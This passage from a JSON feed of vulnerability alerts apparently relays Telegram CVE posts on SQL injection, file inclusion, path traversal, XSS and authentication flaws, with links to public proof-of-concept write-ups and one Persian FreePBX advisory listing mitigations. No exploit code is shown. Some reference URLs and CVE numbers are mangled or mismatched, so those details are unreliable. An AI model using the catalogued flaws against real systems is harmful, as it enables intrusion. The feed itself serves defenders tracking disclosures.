"\ud83d\udccc **CVE ID**: GHSA-7h6m-3862-6xr6\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0208\n2. https://code-projects.org\n3. https://gist.github.com/th4s1s/24925a20d1f9336858dee1cbbb30c249\n4. https://vuldb.com/?ctiid.290145\n5. https://vuldb.com/?id.290145\n6. https://vuldb.com/?submit.44038", "creation_timestamp": "2025-01-05T01:33:26.000000Z"}, {"uuid": "7bc6ee63-4c65-452a-a96e-e5544d230fce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PV74-HCG9-65R4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1404", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22138\n\ud83d\udd39 Description: @codidact/qpixel is a Q&amp;A-based community knowledge-sharing software. In affected versions when a category is set to private or limited-visibility within QPixel's admin tools, suggested edits within this category can still be viewed by unprivileged or anonymous users via the suggested edit queue. This issue has not yet been patched and no workarounds are available. Users are advised to follow the development repo for updates.\n\n### Patches\nNot yet patched.\n\n### Workarounds\nNone available. Private or limited-visibility categories should not be considered ways to store sensitive information.\n\n### References\nInternal: [SUPPORT-114](https://codidact.atlassian.net/issues/SUPPORT-114)\n\ud83d\udccf Published: 2025-01-13T20:34:29.354Z\n\ud83d\udccf Modified: 2025-01-13T20:34:29.354Z\n\ud83d\udd17 References:\n1. https://github.com/codidact/qpixel/security/advisories/GHSA-pv74-hcg9-65r4", "creation_timestamp": "2025-01-13T21:12:32.000000Z"}, {"uuid": "9040beb9-78b1-4818-a4ca-8be14ac76dad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9XJ8-6989-R549", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1403", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-0779\n\ud83d\udd39 Description: At the most basic level, an invalid pointer can be input that crashes the device, but with more knowledge of the device\u2019s memory layout, further exploitation is possible.\n\ud83d\udccf Published: 2023-05-30T00:00:00\n\ud83d\udccf Modified: 2025-01-13T20:35:53.652Z\n\ud83d\udd17 References:\n1. https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-9xj8-6989-r549", "creation_timestamp": "2025-01-13T21:12:30.000000Z"}, {"uuid": "14bac370-4bd0-4f77-9326-6d4309ef13da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VVWJ-FVWH-4WHX", "type": "published-proof-of-concept", "source": "Telegram/CEl2HN4MrzqJMXyxgw87__k5eg4RsD4Gdp10Ib2z_QOK7Dk", "content": "", "creation_timestamp": "2026-04-03T23:21:37.000000Z"}, {"uuid": "1f487fd1-552a-42e2-9610-57080c8d923c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RRVG-CXH4-QHRV", "type": "published-proof-of-concept", "source": "Telegram/CEl2HN4MrzqJMXyxgw87__k5eg4RsD4Gdp10Ib2z_QOK7Dk", "content": "", "creation_timestamp": "2026-04-03T23:21:37.000000Z"}, {"uuid": "7c8c2435-234f-4932-bbd0-1bd5e08787f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2JG8-RMHM-XV9M", "type": "seen", "source": "Telegram/NqFWw_Bg_JewL_I29Tb0q1DIosuMN7rhj0bJY4LtsK35hxc", "content": "", "creation_timestamp": "2026-04-04T01:18:11.000000Z"}, {"uuid": "18fe3be8-8819-468c-b1bf-eeabfef9bbb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5RM9-893Q-VMHM", "type": "seen", "source": "Telegram/NqFWw_Bg_JewL_I29Tb0q1DIosuMN7rhj0bJY4LtsK35hxc", "content": "", "creation_timestamp": "2026-04-04T01:18:11.000000Z"}, {"uuid": "0d91e925-17cb-4926-b419-9f25bca546ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-42MX-VP8M-J7QH", "type": "seen", "source": "Telegram/u2qRHjnv5kQDuTkkxczYUuDfihUUcY0XYmdq7J3tY866RjI", "content": "", "creation_timestamp": "2026-04-23T23:27:29.000000Z"}, {"uuid": "03d99fb0-5f70-4b54-a29c-467dcb066f58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88XG-V53P-FPVF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13892", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46347\n\ud83d\udd25 CVSS Score: 5.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P)\n\ud83d\udd39 Description: YesWiki is a wiki system written in PHP. Prior to version 4.5.4, YesWiki vulnerable to remote code execution. An arbitrary file write can be used to write a file with a PHP extension, which then can be browsed to in order to execute arbitrary code on the server, resulting in a full compromise of the server. This could potentially be performed unwittingly by a user. This issue has been patched in version 4.5.4.\n\ud83d\udccf Published: 2025-04-29T17:11:05.404Z\n\ud83d\udccf Modified: 2025-04-29T17:11:05.404Z\n\ud83d\udd17 References:\n1. https://github.com/YesWiki/yeswiki/security/advisories/GHSA-88xg-v53p-fpvf\n2. https://github.com/YesWiki/yeswiki/commit/8fe5275a78dc7e0f9c242baa3cbac6b5ac1cc066", "creation_timestamp": "2025-04-29T18:12:32.000000Z"}, {"uuid": "4d4f2c5c-a1c4-43b6-84fe-0f424a56851d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-85GG-89QV-8PVC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/106", "content": "\ud83d\udccc **CVE ID**: GHSA-85gg-89qv-8pvc\n\ud83d\udd17 **Aliases**: CVE-2025-0210\n\ud83d\udd39 **Details**: A vulnerability has been found in Campcodes School Faculty Scheduling System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/ajax.php?action=login. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-74\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0210\n2. https://github.com/shaturo133/POCs/blob/main/Blind20SQL20Injection20in20School20Faculty20Scheduling20System.md\n3. https://vuldb.com/?ctiid.290155\n4. https://vuldb.com/?id.290155\n5. https://vuldb.com/?submit.44112\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:38:52.000000Z"}, {"uuid": "9a530cc6-16d2-47f8-91f1-422673fc616f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M4RC-HJCV-QH78", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/109", "content": "\ud83d\udccc **CVE ID**: GHSA-m4rc-hjcv-qh78\n\ud83d\udd17 **Aliases**: CVE-2025-0206\n\ud83d\udd39 **Details**: A vulnerability classified as critical was found in code-projects Online Shoe Store 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/index.php. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T12:30:32Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T12:30:32Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-266\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0206\n2. https://code-projects.org\n3. https://gist.github.com/th4s1s/955b1b20235dddf30689d4b85b4d21\n4. https://vuldb.com/?ctiid.290143\n5. https://vuldb.com/?id.290143\n6. https://vuldb.com/?submit.44033", "creation_timestamp": "2025-01-05T01:39:09.000000Z"}, {"uuid": "505504d1-af79-4356-9ca4-4b1d3d46bbc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R5J8-58V3-G23G", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/101", "content": "\ud83d\udccc **CVE ID**: GHSA-r5j8-58v3-g23g\n\ud83d\udd17 **Aliases**: CVE-2024-41768\n\ud83d\udd39 **Details**: IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3 could allow a remote attacker to cause an unhandled SSL exception which could leave the connection in an unexpected or insecure state.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-544\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-4168\n2. https://www.ibm.com/support/pages/node/180202", "creation_timestamp": "2025-01-05T01:38:22.000000Z"}, {"uuid": "1f6ae5a3-3ac3-4346-a8d3-91dea4b6e2ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WV9-JQ79-5P63", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/36", "content": "\ud83d\udccc **CVE ID**: GHSA-2wv9-jq79-5p63\n\ud83d\udd39 **Summary**: No summary available.\n\ud83d\udd22 **CVSS Score**: N/A\n\ud83d\udd25 **Impact/Severity**: N/A\n\ud83c\udff7\ufe0f **CWE ID**: N/A\n\ud83d\uddd3\ufe0f **Published**: N/A\n\ud83d\udee0\ufe0f **Vendor/Product**: N/A/N/A\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0212\n2. https://github.com/shaturo1337/POCs/blob/main/SQL%20Injection%20in%20Student%20Grading%20System.md\n3. https://vuldb.com/?ctiid.290157\n4. https://vuldb.com/?id.290157\n5. https://vuldb.com/?submit.474168\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:30:30.000000Z"}, {"uuid": "0f2d6a46-de5d-46ba-92b0-9e928325e011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99Q4-QXP3-PJPM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/45", "content": "\ud83d\udccc **CVE ID**: GHSA-99q4-qxp3-pjpm\n\ud83d\udd39 **Summary**: No summary available.\n\ud83d\udd22 **CVSS Score**: N/A\n\ud83d\udd25 **Impact/Severity**: N/A\n\ud83c\udff7\ufe0f **CWE ID**: N/A\n\ud83d\uddd3\ufe0f **Published**: N/A\n\ud83d\udee0\ufe0f **Vendor/Product**: N/A/N/A\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0207\n2. https://code-projects.org\n3. https://gist.github.com/th4s1s/d10dfaebae75c8dbe54ad83d63725d81\n4. https://vuldb.com/?ctiid.290144\n5. https://vuldb.com/?id.290144\n6. https://vuldb.com/?submit.474035", "creation_timestamp": "2025-01-05T01:31:12.000000Z"}, {"uuid": "39b4833d-63be-4313-b992-5c9508c1634b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7H6M-3862-6XR6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/48", "content": "\ud83d\udccc **CVE ID**: GHSA-7h6m-3862-6xr6\n\ud83d\udd39 **Summary**: No summary available.\n\ud83d\udd22 **CVSS Score**: N/A\n\ud83d\udd25 **Impact/Severity**: N/A\n\ud83c\udff7\ufe0f **CWE ID**: N/A\n\ud83d\uddd3\ufe0f **Published**: N/A\n\ud83d\udee0\ufe0f **Vendor/Product**: N/A/N/A\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0208\n2. https://code-projects.org\n3. https://gist.github.com/th4s1s/24925a20d1f9336858dee1cbbb30c249\n4. https://vuldb.com/?ctiid.290145\n5. https://vuldb.com/?id.290145\n6. https://vuldb.com/?submit.474038", "creation_timestamp": "2025-01-05T01:31:39.000000Z"}, {"uuid": "61f3cd68-d786-44ef-bd51-ca90d4e7ca62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5JH2-6V7C-86VJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/50", "content": "\ud83d\udccc **CVE ID**: GHSA-5jh2-6v7c-86vj\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0213\n2. https://github.com/shaturo133/POCs/blob/main/Remote20Code20Execution20via20Arbitrary20File20Upload20in20Project20Management20System.md\n3. https://vuldb.com/?ctiid.290158\n4. https://vuldb.com/?id.290158\n5. https://vuldb.com/?submit.44200\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:32:15.000000Z"}, {"uuid": "a9987796-20b4-4954-85a1-691864f2a852", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-87R4-WG36-7X2V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/83", "content": "\ud83d\udccc **CVE ID**: GHSA-87r4-wg36-7x2v\n\ud83d\udd17 **Aliases**: CVE-2024-41765\n\ud83d\udd39 **Details**: IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-22\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-4165\n2. https://www.ibm.com/support/pages/node/180201", "creation_timestamp": "2025-01-05T01:35:59.000000Z"}, {"uuid": "b94f25f9-a36d-4542-ad19-488dd4262446", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R9GV-QFFM-XW6F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13928", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46549\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: YesWiki is a wiki system written in PHP. Prior to version 4.5.4, an attacker can use a reflected cross-site scripting attack to steal cookies from an authenticated user by having them click on a malicious link. Stolen cookies allow the attacker to take over the user\u2019s session. This vulnerability may also allow attackers to deface the website or embed malicious content. This issue has been patched in version 4.5.4.\n\ud83d\udccf Published: 2025-04-29T20:40:26.765Z\n\ud83d\udccf Modified: 2025-04-29T20:40:26.765Z\n\ud83d\udd17 References:\n1. https://github.com/YesWiki/yeswiki/security/advisories/GHSA-r9gv-qffm-xw6f\n2. https://github.com/YesWiki/yeswiki/commit/107d43056adebaa0c731230f9fd010898e88f3f5", "creation_timestamp": "2025-04-29T21:13:31.000000Z"}, {"uuid": "c771664e-59f2-4446-a2fc-9835a3349ad8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9JVH-MV6X-W698", "type": "published-proof-of-concept", "source": "https://t.me/ics_cert/1368", "content": "\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u0627\u0698\u0648\u0644 Endpoint Manager \u062f\u0631 \u0631\u0627\u0628\u0637 \u0648\u0628 \u0645\u062f\u06cc\u0631\u06cc\u062a \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u062a\u0644\u0641\u0646 IP FreePBX \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0646\u0642\u0635\u200c\u0647\u0627\u06cc\u06cc \u062f\u0631 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0627\u06cc\u062c\u0627\u062f \u0634\u062f\u0647 \u0627\u0633\u062a. \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0646\u0641\u0648\u0630\u06af\u0631\u06cc \u06a9\u0647 \u0628\u0647 \u0635\u0648\u0631\u062a \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0639\u0645\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0627\u062c\u0627\u0632\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u0631\u0627 \u0628\u062f\u0647\u062f.\n\nCVE-2025-66039\n\n\u0646\u0635\u0628 \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc\u200c\u0647\u0627 \u0627\u0632 \u0645\u0646\u0627\u0628\u0639 \u0645\u0639\u062a\u0628\u0631. \u0628\u0627 \u062a\u0648\u062c\u0647 \u0628\u0647 \u0634\u0631\u0627\u06cc\u0637 \u0645\u0648\u062c\u0648\u062f\u060c \u062a\u0648\u0635\u06cc\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc\u200c\u0647\u0627\u06cc \u0646\u0631\u0645\u200c\u0627\u0641\u0632\u0627\u0631\u06cc \u062a\u0646\u0647\u0627 \u067e\u0633 \u0627\u0632 \u0627\u0631\u0632\u06cc\u0627\u0628\u06cc \u062a\u0645\u0627\u0645\u06cc \u0631\u06cc\u0633\u06a9\u200c\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u0646\u0635\u0628 \u0634\u0648\u0646\u062f.\n\n\u0627\u0642\u062f\u0627\u0645\u0627\u062a \u062c\u0628\u0631\u0627\u0646\u06cc:\n- \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0645\u0627\u0698\u0648\u0644 User Manager \u0628\u0631\u0627\u06cc \u0633\u0627\u0632\u0645\u0627\u0646\u062f\u0647\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u062c\u0647\u062a \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0646\u0631\u0645\u200c\u0627\u0641\u0632\u0627\u0631 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u061b\n- \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc \u0641\u0627\u06cc\u0631\u0648\u0627\u0644 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0648\u0628 (WAF) \u0628\u0631\u0627\u06cc \u0641\u06cc\u0644\u062a\u0631 \u06a9\u0631\u062f\u0646 \u062a\u0631\u0627\u0641\u06cc\u06a9 \u0634\u0628\u06a9\u0647\u061b\n- \u062a\u0642\u0633\u06cc\u0645\u200c\u0628\u0646\u062f\u06cc \u0634\u0628\u06a9\u0647 \u0628\u0631\u0627\u06cc \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0646\u0631\u0645\u200c\u0627\u0641\u0632\u0627\u0631 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u061b\n- \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc SIEM \u0628\u0631\u0627\u06cc \u0631\u0635\u062f \u0631\u0648\u06cc\u062f\u0627\u062f\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a\u061b\n- \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0632 \u0634\u0628\u06a9\u0647\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc (\u0627\u06cc\u0646\u062a\u0631\u0646\u062a)\u061b\n- \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0634\u0628\u06a9\u0647\u200c\u0647\u0627\u06cc \u062e\u0635\u0648\u0635\u06cc \u0645\u062c\u0627\u0632\u06cc (VPN) \u0628\u0631\u0627\u06cc \u0633\u0627\u0632\u0645\u0627\u0646\u062f\u0647\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631.\n\n\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062a\u0648\u0635\u06cc\u0647\u200c\u0647\u0627\u06cc \u062a\u0648\u0644\u06cc\u062f\u06a9\u0646\u0646\u062f\u0647:\n\u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0646\u0631\u0645\u200c\u0627\u0641\u0632\u0627\u0631 \u0628\u0647 \u0646\u0633\u062e\u0647 16.0.44 \u0648 \u0628\u0627\u0644\u0627\u062a\u0631\u061b\n\u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0646\u0631\u0645\u200c\u0627\u0641\u0632\u0627\u0631 \u0628\u0647 \u0646\u0633\u062e\u0647 17.0.23 \u0648 \u0628\u0627\u0644\u0627\u062a\u0631\u061b\nhttps://github.com/FreePBX/security-reporting/security/advisories/GHSA-9jvh-mv6x-w698\n\ud83d\udca1\u0627\u06af\u0631 \u0627\u06cc\u0646 \u0645\u062a\u0646 \u062f\u06cc\u062f\u06af\u0627\u0647 \u0634\u0645\u0627 \u0631\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0627\u062f\u060c \u0628\u0627\u0630\u06a9\u0631 \u0645\u0646\u0628\u0639 \u0628\u0647 \u0627\u0634\u062a\u0631\u0627\u06a9 \u0628\u06af\u0630\u0627\u0631\u06cc\u062f. \n\ud83c\udfed\u00a0 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n@pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert\n\u06af\u0631\u0648\u0647 \u062a\u0644\u06af\u0631\u0627\u0645 :\nhttps://t.me/ICSCERT_IR", "creation_timestamp": "2025-12-29T15:30:11.000000Z"}, {"uuid": "38c128b6-ad6a-498c-bbf1-0695f94c6ce8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5CHH-WV34-P78R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/108", "content": "\ud83d\udccc **CVE ID**: GHSA-5chh-wv34-p78r\n\ud83d\udd17 **Aliases**: CVE-2025-0211\n\ud83d\udd39 **Details**: A vulnerability was found in Campcodes School Faculty Scheduling System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/index.php. The manipulation of the argument page leads to file inclusion. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-73\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0211\n2. https://github.com/shaturo133/POCs/blob/main/LFI20in20School20Faculty20Scheduling20System.md\n3. https://vuldb.com/?ctiid.290156\n4. https://vuldb.com/?id.290156\n5. https://vuldb.com/?submit.44115\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:39:04.000000Z"}, {"uuid": "f86bb1f1-d8c8-45ab-842b-6d8510b86734", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5JH2-6V7C-86VJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/35", "content": "\ud83d\udccc **CVE ID**: GHSA-5jh2-6v7c-86vj\n\ud83d\udd39 **Summary**: No summary available.\n\ud83d\udd22 **CVSS Score**: N/A\n\ud83d\udd25 **Impact/Severity**: N/A\n\ud83c\udff7\ufe0f **CWE ID**: N/A\n\ud83d\uddd3\ufe0f **Published**: N/A\n\ud83d\udee0\ufe0f **Vendor/Product**: N/A/N/A\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0213\n2. https://github.com/shaturo1337/POCs/blob/main/Remote%20Code%20Execution%20via%20Arbitrary%20File%20Upload%20in%20Project%20Management%20System.md\n3. https://vuldb.com/?ctiid.290158\n4. https://vuldb.com/?id.290158\n5. https://vuldb.com/?submit.474200\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:30:25.000000Z"}, {"uuid": "17404f00-791a-49e8-a02f-0faa964863e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJ39-GWG7-6872", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/71", "content": "\ud83d\udccc **CVE ID**: GHSA-vj39-gwg7-6872\n\ud83d\udd17 **Aliases**: CVE-2025-0214\n\ud83d\udd39 **Details**: A vulnerability was found in TMD Custom Header Menu 4.0.0.1 on 